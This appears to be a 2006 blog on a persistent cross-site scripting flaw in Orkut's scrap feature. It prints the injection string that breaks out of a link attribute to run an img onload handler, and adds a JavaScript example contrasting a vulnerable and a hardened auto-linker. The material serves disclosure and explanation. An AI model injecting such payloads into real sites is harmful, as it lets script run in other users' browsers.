Tuesday, October 10, 2006
My interpretation - Orkut vector
Interpretation of this page with this injection string.
The Orkut user entered the scrap text as
www.orkut.com/"></a><img src="http://www.bandeirasanimadas.com/Asia/India/3dflagsdotcom_india_2fawm.gif" onload=alert(1)><a style="display:none" href="
Let's greet the independence of India. CHEERS!
Look at the string BEFORE "Let's greet the independence of India. CHEERS!"
Let's call it $USER_LINK.
The string does not contain any newline or any character of that kind. (Remember, the actual injection string was URL-encoded; the URL-decoded string is given here for convenience.)
1. $USER_LINK is parsed by the Orkut server, which takes it to be a link.
2. So it wraps it in <a href="$USER_LINK">whatever</a>.
3. The rest of the text after the newline is kept as is.
4. Effectively, the user gets the following:
<a href= "www.orkut.com/"></a><img src="http://www.bandeirasanimadas.com/Asia/India/3dflagsdotcom_india_2fawm.gif" onload=alert(1)><a style="display:none" href=" " >whatever</a>
Let's greet the independence of India. CHEERS!
Effectively, the quote and ">" at the start of $USER_LINK close the href attribute and the anchor tag, so everything after them lands in the page as raw HTML, and that was it!
Hope this makes sense. Sorry for not having the real HTML. They fixed it before I could save the HTML.
BTW, this was how I could find the XSS WITHOUT really attacking Orkut. I know I should not be attacking them without their permission and they won't give anybody this permission anyway [:d]
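As an added illustration of the breakout described above (example code written here, not Orkut's own): a toy scrap auto-linker that behaves the way the post assumes Orkut's did (it wraps the first line of a scrap in an anchor tag verbatim and appends the rest unchanged), beside a hardened version that HTML-escapes every token and only links tokens that pass a strict URL check. The renderer, the SAFE_URL pattern and the audit helper are all assumptions for the example; the scrap text is the page's own decoded string, reconstructed inline.

```javascript
// Added example, not Orkut's code. A toy scrap auto-linker that reproduces the
// breakout described on this page, beside a hardened version. Assumptions:
// Orkut wrapped the first line of a scrap in <a href="..."> without escaping
// it, and appended the rest of the text unchanged.

// The injection string from the page, reconstructed as a constructed sample
// (URL-decoded; first line is the "link", second line is the greeting).
const SCRAP = [
  'www.orkut.com/"></a><img src="http://www.bandeirasanimadas.com/Asia/India/3dflagsdotcom_india_2fawm.gif" onload=alert(1)><a style="display:none" href="',
  "Let's greet the independence of India. CHEERS!",
].join('\n');

// A benign scrap (constructed) to show the hardened linker still links real URLs.
const BENIGN = 'www.orkut.com/\nHappy Independence Day!';

// Only http(s)/www tokens with no whitespace, quotes or angle brackets are linkable.
const SAFE_URL = /^(https?:\/\/|www\.)[^\s"'<>\\]+$/;

// Escape the characters that matter in HTML text and double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable linker: the first line goes raw into href and into the link text,
// the rest of the scrap is appended raw. A quote in the first line ends the attribute.
function renderScrapVulnerable(text) {
  const [first, ...rest] = text.split('\n');
  if (!/^(https?:\/\/|www\.)/.test(first)) return text;
  return `<a href="${first}">${first}</a>\n${rest.join('\n')}`;
}

// Hardened linker: every token is HTML-escaped, and only tokens that pass the
// strict URL check are wrapped in an anchor (with the href escaped as well).
function renderScrapHardened(text) {
  return text
    .split(/(\s+)/) // the capturing group keeps the whitespace runs
    .map((tok) => {
      if (!SAFE_URL.test(tok)) return escapeHtml(tok);
      const href = tok.startsWith('www.') ? 'http://' + tok : tok;
      return `<a href="${escapeHtml(href)}">${escapeHtml(tok)}</a>`;
    })
    .join('');
}

// Defender's check: list the element names in the rendered HTML and count tags
// carrying an on* event-handler attribute. A scrap should only ever yield <a>.
function audit(html) {
  const tags = [];
  let handlers = 0;
  for (const m of html.matchAll(/<([a-z][a-z0-9]*)\b([^>]*)>/gi)) {
    tags.push(m[1].toLowerCase());
    if (/\bon[a-z]+\s*=/i.test(m[2])) handlers += 1;
  }
  return { tags, handlers };
}

console.log('vulnerable:', audit(renderScrapVulnerable(SCRAP)));
console.log('hardened:  ', audit(renderScrapHardened(SCRAP)));
console.log('benign:    ', audit(renderScrapHardened(BENIGN)));
```

In the vulnerable output the injected img element appears twice, once from the href and once from the link text, because neither is escaped. The hardened linker fails closed: anything that is not a clean URL token is rendered as text, so the audit finds no element at all for the injection string, while a plain www.orkut.com/ line is still turned into a link.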
Monday, October 09, 2006
URL decoded version
www.orkut.com/"></a><img src="http://www.bandeirasanimadas.com/Asia/India/3dflagsdotcom_india_2fawm.gif" onload=alert(1)><a style="display:none" href="
Let's greet the independence of India. CHEERS!
Friday, October 06, 2006
Orkut XSS - silently fixed!
On the 14th of August, I got a scrap from my friend wishing me a happy Independence Day (15th).
I noticed one interesting thing: I could see an image of the Indian flag along with the scrap.
I quickly realized that something was wrong. The same scraps were floating around all over Orkut that day. After modifying the scrap text a little, I could verify that the XSS did in fact exist.
When I opened my scrap book that night, I couldn't see images any more. Had the scrap not spread on such a large scale, this XSS would have remained unnoticed I believe.
What concerned me was that this XSS was of persistent type!
Scrap Text that was used to verify this ->
www.orkut.com/%22%3e%3c/a%3e%3Cimg%20src%3D%22http%3A//www.bandeirasanimadas.com/Asia/India/3dflagsdotcom_india_2fawm.gif%22%20onload%3Dalert%281%29%3E%3Ca%20style%3D%22display%3Anone%22%20href%3D%22
Let's greet the independence of India. CHEERS!